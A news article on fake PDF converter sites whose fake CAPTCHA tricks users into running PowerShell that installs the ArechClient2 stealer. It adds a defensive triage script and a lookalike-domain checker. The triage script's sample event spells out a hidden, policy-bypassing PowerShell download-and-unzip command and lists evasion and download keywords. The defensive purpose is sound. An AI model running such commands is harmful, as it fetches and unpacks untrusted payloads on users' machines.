- Fake PDF converters are tricking users with cloned sites and fake CAPTCHAs
- The PowerShell command installs malware that steals browser and cryptocurrency wallet data
- The attackers use realistic designs and social engineering to avoid detection
Cybercriminals are using fake PDF converters to install powerful malware on victims' systems, experts have warned.
CloudSEK's research found that the attackers clone popular file conversion websites such as PDFCandy.com, replicating their logos and branding, to trick users into downloading malicious software.
CloudSEK says these fake sites are almost identical to the real ones. When someone tries to convert a file, the page shows a fake loading screen and then requests a CAPTCHA verification. Instead of confirming that the user is human, this step leads to an instruction to run a PowerShell command. Following that instruction downloads a ZIP file containing malware known as ArechClient2, part of the SectopRAT information-stealer family.
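The chain above (a browser page persuading the user to run a PowerShell command that fetches a ZIP) leaves a recognisable footprint in process-creation telemetry: powershell.exe started by a browser or by explorer.exe, with a command line that downloads from the web and references an archive. The following is an added example of a triage check over such events; it is not CloudSEK's code or data, and the sample events, parent-process list and keyword lists are constructed assumptions for illustration.

```python
"""Triage process-creation events for the fake-converter pattern:
PowerShell launched from a browser/explorer.exe with a download-and-unzip
command line. Sample events below are constructed, not real telemetry."""
from dataclasses import dataclass
from typing import List, Tuple

# Assumed: processes from which a user would paste and run a copied command.
USER_FACING_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe"}
# Assumed keyword lists; tune them to your environment's normal admin activity.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadfile(", "downloadstring(",
                    "start-bitstransfer", "curl ")
ARCHIVE_MARKERS = ("expand-archive", ".zip", "zipfile")
EVASION_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                   "-ep bypass", "-executionpolicy bypass")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def reasons_for(ev: ProcessEvent) -> List[str]:
    """Return the suspicious traits of one event (empty list if none)."""
    reasons: List[str] = []
    if ev.image.lower() not in ("powershell.exe", "pwsh.exe"):
        return reasons
    cmd = ev.command_line.lower()
    if ev.parent_image.lower() in USER_FACING_PARENTS:
        reasons.append("parent is a browser or explorer.exe (user-run command)")
    if any(m in cmd for m in DOWNLOAD_MARKERS):
        reasons.append("command line downloads content from the web")
    if any(m in cmd for m in ARCHIVE_MARKERS):
        reasons.append("command line references a ZIP archive")
    if any(m in cmd for m in EVASION_MARKERS):
        reasons.append("hidden window / no profile / execution-policy bypass switches")
    return reasons


def severity(ev: ProcessEvent) -> str:
    """high: user-run PowerShell that downloads; medium: two traits; low: one; none."""
    r = reasons_for(ev)
    if not r:
        return "none"
    if any(x.startswith("parent") for x in r) and any("downloads" in x for x in r):
        return "high"
    return "medium" if len(r) >= 2 else "low"


def triage(events: List[ProcessEvent]) -> List[Tuple[str, List[str]]]:
    return [(severity(ev), reasons_for(ev)) for ev in events]


# Constructed sample events (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    ProcessEvent("msedge.exe", "powershell.exe",
                 "powershell.exe -w hidden -ep bypass -c \"Invoke-WebRequest "
                 "'https://converter.example.invalid/out.zip' -OutFile $env:TEMP\\out.zip; "
                 "Expand-Archive $env:TEMP\\out.zip $env:TEMP\\out\""),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe Get-Process | Sort-Object CPU"),
    ProcessEvent("cmd.exe", "powershell.exe",
                 "powershell.exe Invoke-WebRequest https://updates.example.invalid/patch.msi "
                 "-OutFile patch.msi"),
    ProcessEvent("msedge.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for ev, (sev, why) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{sev:6} {ev.parent_image} -> {ev.image}: {'; '.join(why) or '-'}")
```

Only the first constructed event reaches "high": the browser parent on its own is routine (the second event), and a download from a script or cmd.exe parent (the third) is common in patching, so each scores "low" alone; it is the combination that matches the campaign described.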
Collecting personal data, and worse
The malware uses a series of stealth techniques to infect the system. It blends in with normal Windows processes to hide its activity and begins collecting browser passwords, cryptocurrency wallet information and other sensitive data. Once active, the malware can send the stolen information back to the attackers, CloudSEK reports.
The FBI has already warned that online file converters are becoming a popular way for criminals to spread malware. CloudSEK's research shows that attackers are refining their methods, skilfully combining realistic website designs with social-engineering tricks to lower users' defenses.
As online tools become part of daily work and personal life, it is important to know how to avoid these threats.
How to stay safe
The best way to protect yourself is to avoid clicking on random search results for online file converters. Always go directly to the known official websites.
Also, always check the website address for small spelling changes that are easy to miss.
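Checking an address for small spelling changes can be automated against a short allowlist of converters you actually use. The following is an added example, not code from the article or from CloudSEK: it takes a URL, reduces it to the registrable domain, normalises look-alike characters, and reports whether the site is the allowlisted one, a look-alike (different TLD, swapped characters, a near-miss spelling, or the real brand used as a subdomain of another domain), or unrelated. The allowlist contains only pdfcandy.com, the brand named in the article; the homoglyph table and the two-label simplification of the registrable domain are assumptions.

```python
"""Classify a URL as exact / lookalike / unrelated against an allowlist of
trusted converter domains. Added example; allowlist and tables are assumptions."""
import unicodedata
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Allowlist of sites the user intends to use (pdfcandy.com is named in the article).
KNOWN_GOOD = {"pdfcandy.com"}

# Characters and digraphs that read like a Latin letter at a glance (assumed table;
# the Cyrillic entries are written as escapes so they are unambiguous in source).
HOMOGLYPHS = {
    "0": "o", "1": "l", "rn": "m", "vv": "w",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0455": "s",
}


def normalize(label: str) -> str:
    """Lowercase, apply compatibility normalisation, then fold homoglyphs."""
    label = unicodedata.normalize("NFKC", label).lower()
    for src, dst in HOMOGLYPHS.items():
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(url: str) -> Tuple[str, str]:
    """Return (full hostname, registrable domain). Simplification: the last two
    labels are treated as the registrable domain; a production tool would use
    the Public Suffix List so that e.g. example.co.uk is handled correctly."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    if host.startswith("www."):
        host = host[4:]
    return host, ".".join(host.split(".")[-2:])


def classify(url: str) -> Tuple[str, Optional[str], str]:
    """Return (verdict, matched allowlisted domain or None, reason)."""
    host, reg = registrable_domain(url)
    if reg in KNOWN_GOOD:
        return "exact", reg, "registrable domain is on the allowlist"
    reg_label, reg_tld = reg.rsplit(".", 1) if "." in reg else (reg, "")
    for good in KNOWN_GOOD:
        good_label, good_tld = good.rsplit(".", 1)
        # Real brand appearing as a subdomain of some other registrable domain.
        if host.startswith(good + ".") or ("." + good + ".") in host:
            return "lookalike", good, "allowlisted domain used as a subdomain of another domain"
        if normalize(reg_label) == good_label:
            reason = "different TLD" if reg_tld != good_tld else "lookalike characters in the name"
            return "lookalike", good, reason
        if levenshtein(normalize(reg_label), good_label) <= 2:
            return "lookalike", good, "name within two edits of the allowlisted domain"
    return "unrelated", None, "no resemblance to allowlisted domains"


if __name__ == "__main__":
    # Constructed URLs; none of them is a real site from the article.
    for u in ("https://www.pdfcandy.com/pdf-to-word", "https://pdfcandy.co/convert",
              "https://pdf-candy.com/", "https://pdfc\u0430ndy.com/",
              "http://pdfcandy.com.evil.invalid/convert", "https://mail.example.org/inbox"):
        print(u, "->", classify(u))
```

The two-edit threshold is deliberately tight: wider thresholds start flagging unrelated short names, while the homoglyph fold and the subdomain check catch the cases that an edit distance alone would miss.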
For a good starting point, see our roundup of the best PDF editors and the best free PDF editors. We also recommend the best Adobe Acrobat alternatives.
Staying cautious when uploading documents online can stop many of these attacks before they start.
Keep your antivirus software up to date (you're doing this anyway, right?) and scan any downloaded file before opening it. Installing browser extensions that block suspicious or dangerous sites can also help.
If a website asks you to run PowerShell commands or download additional files after uploading a document, close the page immediately.
Finally, if you think you have been tricked, disconnect the device from the internet immediately, change all important passwords from a safe device and notify your bank or service providers as soon as possible.